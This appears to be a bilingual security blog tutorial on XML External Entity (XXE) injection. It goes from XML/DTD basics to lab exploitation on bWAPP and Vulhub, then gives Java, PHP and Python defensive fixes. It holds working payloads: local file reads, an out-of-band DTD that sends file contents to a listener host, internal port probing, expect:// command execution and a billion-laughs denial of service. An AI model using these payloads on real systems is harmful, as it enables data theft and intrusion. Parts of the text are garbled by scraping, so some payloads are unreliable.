1. WEB security part
If you want to understand XXE, you need to understand the basics of XML before that
2. XML Basics
2.1 XML syntax
1. All XML elements must have a closing tag
2.XML tags are case sensitive
3.XML must be properly nested
4. XML documents must have a root element
5. XML attribute values must be quoted
Entity references, <> symbols may appear in tag attributes and corresponding position values, but these symbols have special meanings in the corresponding XML. At this time, we must use the representation corresponding to the corresponding html entity, such as < corresponding to The entity of the symbol is <, and the entity corresponding to the > symbol is >
In XML, spaces will be reserved, such as: <p>a space B</p>, then the space between a and B will be reserved
2.2 XML structure
2.2.1 XML document declaration
<?xml version="1.0" encoding="utf-8"?>
2.2.2 Elements
Elements are the main building blocks of XML and HTML documents, and elements can contain text, other elements, or be empty.
<body> body text in between </body>
<message> some message in between </message> Empty elements are for example: hr, br, img
2.2.3 Properties
Attributes provide additional information about an element
<img src="computer.gif"/> Among them, src is an attribute
2.2.4 Entities
Entities are divided into four types, namely:
character entity
named entity
external entity
parameter entity
2.3 Document Type Definition--DTD
DTD is used to standardize the XML document format. It can be used to describe which elements/attributes are legal and how elements should be nested/combined. It can also be used to customize some special characters and reusable code segments as entities.
A DTD can be embedded in an XML document (internal declaration) or stored in a separate file (external reference)
2.3.1 DTD internal statement
If the DTD is included in your XML source file, it should be wrapped in a DOCTYPE declaration with the following syntax:
<!DOCTYPE root element [element declaration]>
Internal declaration DTD example
<?xml version="1.0"?>
<!DOCTYPE note [
<!ELEMENT note (to,from,heading,body)> <!ELEMENT to(#PCDATA)> <!ELEMENT from(#PCDATA)> <!ELEMENT heading (#PCDATA)> <!ELEMENT body(#PCDATA)>
]>
<note><to> George </to><from> John </from><heading> Reminder </heading><body> Don't forget the meeting! </body>
</note> The above DTD is interpreted as follows:
!DOCTYPE note (second line) defines that this document is a document of type note.
!ELEMENT note (the third line) defines that the note element has four elements: "to, from, heading, body"
!ELEMENT to (fourth line) defines the to element as "#PCDATA" type
!ELEMENT from (line 5) defines the from element as "#PCDATA" type
!ELEMENT heading (line 6) defines the heading element as "#PCDATA" type
!ELEMENT body (line 7) defines the body element as "#PCDATA" type
2.3.2 DTD external reference
If the DTD is external to the XML source file, it should be encapsulated in a DOCTYPE definition with the following syntax:
<!DOCTYPE root element SYSTEM "filename">
This XML document is the same as the XML document above, but has an external DTD:
<?xml version="1.0"?>
<!DOCTYPE note SYSTEM "note.dtd">
<note>
<to>George</to>
<from>John</from>
<heading>Reminder</heading>
<body>Don't forget the meeting!</body>
</note> note.dtd:
<!ELEMENT note (to,from,heading,body)>
<!ELEMENT to (#PCDATA)>
<!ELEMENT from (#PCDATA)>
<!ELEMENT heading (#PCDATA)>
<!ELEMENT body (#PCDATA)> 2.3.3 PCDATA
PCDATA means parsed character data (parsed character data).
PCDATA is the text that will be parsed by the parser. These texts will be checked by the parser for entities and tags. Tags in the text will be treated as tags, and entities will be expanded. It is worth noting that PCDATA should not contain &, < and > characters, and & < > should be used Entity replacement, or use CDATA
2.3.4 CDATA
CDATA means character data.
CDATA is text that will not be parsed by the parser.
The & and < characters are illegal in XML, because the parser will interpret < as the start of a new element and & as the start of a character entity, so when we need to use a code that contains a large number of &, < characters , you can use CDATA
CDATA is terminated by . In CDATA, it cannot contain ]]> string, nor can it nest CDATA. The ending ]]> string cannot contain any spaces and newlines
2.3.5 DTD entities
DTD entities are variables used to define shortcuts that refer to plain text or special characters, and can be declared internally or referenced externally.
Entities are divided into general entities and parameter entities
1. The declaration syntax of general entities:
The way to refer to the entity: &entity name;
2. The parameter entity can only be used in DTD, the declaration format of the parameter entity:
The way to refer to the entity: %entity name;
2.3.5.1 Internal entities
<!ENTITY writer "Bill Gates">
<!ENTITY copyright "Copyright W3School.com.cn">
<author>&writer;©right;</author> 2.3.5.2 External entities
External entities, used to introduce external resources. There are two keywords, SYSTEM and PUBLIC, indicating whether the entity is from a local computer or a public computer
<<img src="http://www.w3school.com.cn/dtd/entities.dtd"" style="margin: auto" />
<<img src="http://www.w3school.com.cn/dtd/entities.dtd"" style="margin: auto" />
<author>&writer;©right;</author> Different programs support different protocols
LIBXML2 |
PHP |
JAVA |
.NET |
file |
file |
http |
file |
http |
http |
https |
http |
ftp |
ftp |
ftp |
https |
php |
file |
ftp |
|
compress.zlib |
jar |
||
compress.bzip2 |
netdoc |
||
data |
milk |
||
glob |
gopher * |
||
phar |
Among them, php supports more protocols, but requires certain extended support.
3. XXE
XXE is XML external entity injection. As can be seen from the above, external entities refer to DTD external entities, and the reason for XXE is that when parsing XML, malicious external entities can be parsed to load malicious external files, causing file reading , command execution, intranet port scanning, attacking intranet websites, initiating dos attacks and other hazards
how to judge
3.1 How to judge whether there is XXE
Take the bwapp shooting range as an example
First check the http header to see if there are XML related strings
Then judge whether the XML content is parsed
After finding the modified content, the server will parse the corresponding content back
3.2 Hazards that XXE can cause
3.2.1 Reading files
The main use is to use XXE to read files, here I use bwapp shooting range as the environment
When I built the environment, I used the environment with php version 5.2.17. I used phpstudy to build the environment. If the php version is greater than 5.2.17 or the docker environment (php version is 5.5.9) will cause no echo, of course it may It's just my environment problem, but if you use the correct payload when injecting with low difficulty, it will display An error occurred!, you can try my method
3.2.1.1 **** has echo
首先先进入XXE漏洞的测试界面
http://192.168.0.105/bwapp/xxe-1.php
进行抓包,发现存在text/xml
通过修改数据,观察服务器是否会解析XML的内容
确定服务器会解析XML内容,就可以自己构造注入了
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test[<!ENTITY bee SYSTEM "file:///d:/robots.txt">
]>
<reset><login>&bee;</login><secret>Any bugs?</secret></reset> XML的外部实体“bee”被赋予的值为:file:///d:/robots.txt,当解析xml文档时,bee会被替换为file:///d:/robots.txt的内容。就被执行回显回来了。
3.2.1.2 无回显(Blind XXE)
但是在实际环境中XML大多数时候并非是为了输出用,所以很多时候是不会有输出的,这样即使XML被解析了但是是无法直接读取文件的,所以我们需要外带数据,把数据发送出来读取
靶场环境:Vulhub - Docker-Compose file for vulnerability environment
搭建好环境后先进入此页面http://192.168.3.25:8983/solr/#/demo/query,然后点击提交,进行抓包,并把包发送到重放器
在本地主机(使用桥接)或者是云服务器,反正能让目标服务器连接到的ip的主机即可,在此服务器上创建dtd文件
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd "<!ENTITY data SYSTEM ':%file;'>"> 创建完后修改包内的payload
`/solr/demo/select?_=1641268411205&q=<%3fxml+version%3d"1.0"+%3f><
%25send%3b%25dtd%3b]> %26data%3b &wt=xml&defType=xmlparser" style="margin: auto" />
该payload解码后为
<?xml version="1.0" ?><<img src="%send;%dtd;]> &data; &wt=xml&defType=xmlparser" target="_blank">http://192.168.3.35/xxe.dtd">%send;%dtd;]><r>&data;</r>&wt=xml&defType=xmlparser注意,[http://192.168.3.35/xxe.dtd这句需要改为自己的地址,同时发包的时候不要把&wt=xml&defType=xmlparser进行url编码,直接复制上去就好了](https://link.juejin.cn/?target=https%3A%2F%2Fwww.oschina.net%2Faction%2FGoToLink%3Furl%3Dhttp%253A%252F%252F192.168.3.35%252Fxxe.dtd%2525E8%2525BF%252599%2525E5%25258F%2525A5%2525E9%25259C%252580%2525E8%2525A6%252581%2525E6%252594%2525B9%2525E4%2525B8%2525BA%2525E8%252587%2525AA%2525E5%2525B7%2525B1%2525E7%25259A%252584%2525E5%25259C%2525B0%2525E5%25259D%252580%2525EF%2525BC%25258C%2525E5%252590%25258C%2525E6%252597%2525B6%2525E5%25258F%252591%2525E5%25258C%252585%2525E7%25259A%252584%2525E6%252597%2525B6%2525E5%252580%252599%2525E4%2525B8%25258D%2525E8%2525A6%252581%2525E6%25258A%25258A%2526wt%253Dxml%2526defType%253Dxmlparser%2525E8%2525BF%25259B%2525E8%2525A1%25258Curl%2525E7%2525BC%252596%2525E7%2525A0%252581%2525EF%2525BC%25258C%2525E7%25259B%2525B4%2525E6%25258E%2525A5%2525E5%2525A4%25258D%2525E5%252588%2525B6%2525E4%2525B8%25258A%2525E5%25258E%2525BB%2525E5%2525B0%2525B1%2525E5%2525A5%2525BD%2525E4%2525BA%252586 "https://www.oschina.net/action/GoToLink?url=http%3A%2F%2F192.168.3.35%2Fxxe.dtd%25E8%25BF%2599%25E5%258F%25A5%25E9%259C%2580%25E8%25A6%2581%25E6%2594%25B9%25E4%25B8%25BA%25E8%2587%25AA%25E5%25B7%25B1%25E7%259A%2584%25E5%259C%25B0%25E5%259D%2580%25EF%25BC%258C%25E5%2590%258C%25E6%2597%25B6%25E5%258F%2591%25E5%258C%2585%25E7%259A%2584%25E6%2597%25B6%25E5%2580%2599%25E4%25B8%258D%25E8%25A6%2581%25E6%258A%258A%26wt%3Dxml%26defType%3Dxmlparser%25E8%25BF%259B%25E8%25A1%258Curl%25E7%25BC%2596%25E7%25A0%2581%25EF%25BC%258C%25E7%259B%25B4%25E6%258E%25A5%25E5%25A4%258D%25E5%2588%25B6%25E4%25B8%258A%25E5%258E%25BB%25E5%25B0%25B1%25E5%25A5%25BD%25E4%25BA%2586"" style="margin: auto" />
以上情况是当php报错时将里面的数据,如果php没有报错则使用下面的方法
首先先监听端口,然后在上面的基础上修改一下dtd文件
<!ENTITY % file SYSTEM "file:///h:/test.txt">
<!ENTITY % dtd "<!ENTITY data SYSTEM '192.168.3.35:666/?%file;'>"> 在连接后面附上监听的端口,发送后会在监听处收到信息,如果没有可以尝试查看服务器日志
这里用一下别人的图
参考链接:XXE漏洞详解——进阶篇 - FreeBuf网络安全行业门户
但是我这里复现没有成功,也有可能是直接通过报错读出文件的原因,但是还是记录一下这种情况
3.2.1.3 读取PHP等文件
由于一些文件,如php文件内含有<等字符,在读取的时候想、解析器会将这些解析为xml语言导致语法错误,所以为了避免这种情况出现使用伪协议来读取
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE test[<!ENTITY bee SYSTEM "php://filter/read=convert.base64-encode/resource=file:///d:/robots.txt">
]>
<reset><login>&bee;</login><secret>Any bugs?</secret></reset> 3.2.1.4 端口探测
同样使用bwapp靶场作为环境
前面的流程基本一致,抓包后构造注入
在http连接后跟端口,如果端口开启,则会显示 failed to open stream: HTTP request failed!,否则不显示(或者显示failed to open stream: Connection refuse!或500状态码)
我这里使用phpstudy作为环境,所以开启了3306端口
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack[
<<img src="http://192.168.3.25:3306"" style="margin: auto" />
]> 测试666端口,机器没有开启,所以在发送包后获取响应包需要很长一段时间,最后报500错误码
测试1234端口,本机同样为开启,也是等待了一小会才获取到的响应包
3.2.1.5 远程命令执行RCE
要想要RCE需要使用expect协议,其他协议也有可能可以执行命令
expect需要安装expect拓展
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE hack[
<!ENTITYbee SYSTEM "expect://whoami">
]> 3.2.1.6 DDOS 攻击
参考文章:XXE从入门到放弃 - 安全客,安全资讯平台 (anquanke.com)
<?xml version="1.0"?>
<!DOCTYPE lolz [<!ENTITY lol "abc"><!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"><!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"><!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"><!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"><!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"><!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"><!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"><!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz> 该攻击通过创建一项递归的 XML 定义,在内存中生成十亿个”abc”字符串,从而导致 DDoS 攻击。原理为:构造恶意的XML实体文件耗尽可用内存,因为许多XML解析器在解析XML文档时倾向于将它的整个结构保留在内存中,解析非常慢,造成了拒绝服务器攻击。
3.2.1.7 防御XXE
方案一、使用开发语言提供的禁用外部实体的方法
PHP:
libxml_disable_entity_loader(true);
JAVA:看下面的代码审计
Python:
第三方模块lxml按照修改设置来改就可以
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
def xxe():tree = etree.parse('xml.xml', etree.XMLParser(resolve_entities=False))# tree = lxml.objectify.parse('xml.xml', etree.XMLParser(resolve_entities=False))return etree.tostring(tree.getroot())
尝试改用defusedxml 是一个纯 Python 软件包,它修改了所有标准库 XML 解析器的子类,可以防止任何潜在的恶意操作。 对于解析不受信任的XML数据的任何服务器代码,建议使用此程序包。 方案二、过滤用户提交的XML数据
关键词:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。
不允许XML中含有任何自己声明的DTD
有效的措施:配置XML parser只能使用静态DTD,禁止外来引入;对于Java来说,直接设置相应的属性值为false即可
参考文章:(38条消息) XXE详解_bylfsj的博客-CSDN博客_xxe
四、JAVA代码审计部分
XXE为XML External Entity Injection的英文缩写,当开发人员允许xml解析外部实体时,攻击者可构造恶意外部实体来达到任意文件读取、内网端口探测、命令执行、拒绝服务攻击等方面的攻击。
产生XXE有三个条件,首先是解析了XML,其次是XML外部可控。最后是没有禁用外部实体
五、XML常见接口
5.1 XMLReader
XMLReader接口是一种通过回调读取XML文档的接口,其存在于公共区域中。XMLReader接口是XML解析器实现SAX2驱动程序所必需的接口,其允许应用程序设置和查询解析器中的功能和属性、注册文档处理的事件处理程序,以及开始文档解析。当XMLReader使用默认的解析方法并且未对XML进行过滤时,会出现XXE漏洞
5.2 SAXBuilder
SAXBuilder是一个JDOM解析器,其能够将路径中的XML文件解析为Document对象。SAXBuilder使用第三方SAX解析器来处理解析任务,并使用SAXHandler的实例侦听SAX事件。当SAXBuilder使用默认的解析方法并且未对XML进行过滤时,会出现XXE漏洞
5.3 SAXReader
DOM4J是dom4j.org出品的一个开源XML解析包,使用起来非常简单,只要了解基本的XML-DOM模型,就能使用。DOM4J读/写XML文档主要依赖于org.dom4j.io包,它有DOMReader和SAXReader两种方式。因为使用了同一个接口,所以这两种方式的调用方法是完全一致的。同样的,在使用默认解析方法并且未对XML进行过滤时,其也会出现XXE漏洞。
5.4 SAXParserFactory
SAXParserFactory使应用程序能够配置和获取基于SAX的解析器以解析XML文档。其受保护的构造方法,可以强制使用newInstance()。跟上面介绍的一样,在使用默认解析方法且未对XML进行过滤时,其也会出现XXE漏洞。
5.5 Digester
Digester类用来将XML映射成Java类,以简化XML的处理。它是Apache Commons库中的一个jar包:common-digester包。一样的在默认配置下会出现XXE漏洞。其触发的XXE漏洞是没有回显的,我们一般需通过Blind XXE的方法来利用
5.6 DocumentBuilderFactory
javax.xml.parsers包中的DocumentBuilderFactory用于创建DOM模式的解析器对象,DocumentBuilderFactory是一个抽象工厂类,它不能直接实例化,但该类提供了一个newInstance()方法,这个方法会根据本地平台默认安装的解析器,自动创建一个工厂的对象并返回。
六、接口代码审计&修复
通过了解XXE的原理了解到防御XXE只需要做到以下几点
1、不解析XML,但是有的时候业务需要
2、禁用dtd,同样很多时候无法实现
3、禁用外部实体和参数实体
对大部分时候,都可以通过设置feature来控制解析器的行为
// 这是优先选择. 如果不允许DTDs (doctypes) ,几乎可以阻止所有的XML实体攻击
setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );
// 如果不能完全禁用DTDs,最少采取以下措施,必须两项同时存在
setFeature ( "http://xml.org/sax/features/external-general-entities" , false ); // 防止外部实体POC
setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false ); // 防止参数实体POC 如果是启用了XIclude则要在feature规则前添加
dbf . setXIncludeAware ( true ); // 支持XInclude
dbf . setNamespaceAware ( true );// 支持XInclude 以下代码均出于:java-sec-code/XXE.java at master · JoyChou93/java-sec-code (github.com)
6.1 XMLReader
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );XMLReader xmlReader = XMLReaderFactory . createXMLReader ();xmlReader . parse ( new InputSource ( new StringReader ( body )));// parse xmlreturn "xmlReader xxe vuln code" ;
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.2 修复代码
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );XMLReader xmlReader = XMLReaderFactory . createXMLReader ();// fix code startxmlReader . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );xmlReader . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );xmlReader . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false );//fix code endxmlReader . parse ( new InputSource ( new StringReader ( body )));// parse xml
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.3 SAXBuilder
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXBuilder builder = new SAXBuilder ();// org.jdom2.Document documentbuilder . build ( new InputSource ( new StringReader ( body )));// cause xxereturn "SAXBuilder xxe vuln code" ;
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.4 修复代码:
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXBuilder builder = new SAXBuilder (); // fix code startbuilder . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );builder . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );builder . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false ); // fix code end// org.jdom2.Document documentbuilder . build ( new InputSource ( new StringReader ( body )));
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.5 SAXReader
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXReader reader = new SAXReader ();// org.dom4j.Document documentreader . read ( new InputSource ( new StringReader ( body ))); // cause xxe
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 修复代码:
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXReader reader = new SAXReader ();// fix code startreader . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );reader . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );reader . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false );// fix code end// org.dom4j.Document documentreader . read ( new InputSource ( new StringReader ( body )));
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.6 SAXParserFactory
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXParserFactory spf = SAXParserFactory . newInstance ();SAXParser parser = spf . newSAXParser ();parser . parse ( new InputSource ( new StringReader ( body )), new DefaultHandler ());// parse xmlreturn "SAXParser xxe vuln code" ;
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.7 修复代码:
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXParserFactory spf = SAXParserFactory . newInstance ();// fix code startspf . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );spf . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );spf . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false );// fix code startSAXParser parser = spf . newSAXParser ();parser . parse ( new InputSource ( new StringReader ( body )), new DefaultHandler ());// parse xml
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.8 Digester
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );Digester digester = new Digester ();digester . parse ( new StringReader ( body ));// parse xml
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 修复代码:
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );Digester digester = new Digester (); // fix code startdigester . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );digester . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );digester . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false ); // fix code enddigester . parse ( new StringReader ( body ));// parse xmlreturn "Digester xxe security code" ;
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.9 DocumentBuilderFactory
修复代码:
try {String body = WebUtils . getRequestBody ( request );logger . info ( body );SAXParserFactory spf = SAXParserFactory . newInstance ();SAXParser saxParser = spf . newSAXParser ();XMLReader xmlReader = saxParser . getXMLReader ();xmlReader . setFeature ( "http://apache.org/xml/features/disallow-doctype-decl" , true );xmlReader . setFeature ( "http://xml.org/sax/features/external-general-entities" , false );xmlReader . setFeature ( "http://xml.org/sax/features/external-parameter-entities" , false );xmlReader . parse ( new InputSource ( new StringReader ( body )));
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 6.11 DocumentHelper
try {String body = WebUtils . getRequestBody ( req );DocumentHelper . parseText ( body ); // parse xml
} catch ( Exception e ) {logger . error ( e . toString ());return EXCEPT ;
} 修复该漏洞只需升级dom4j到2.1.1及以上,该版本及以上禁用了ENTITY;
不带ENTITY的PoC不能利用,所以禁用ENTITY即可完成修复。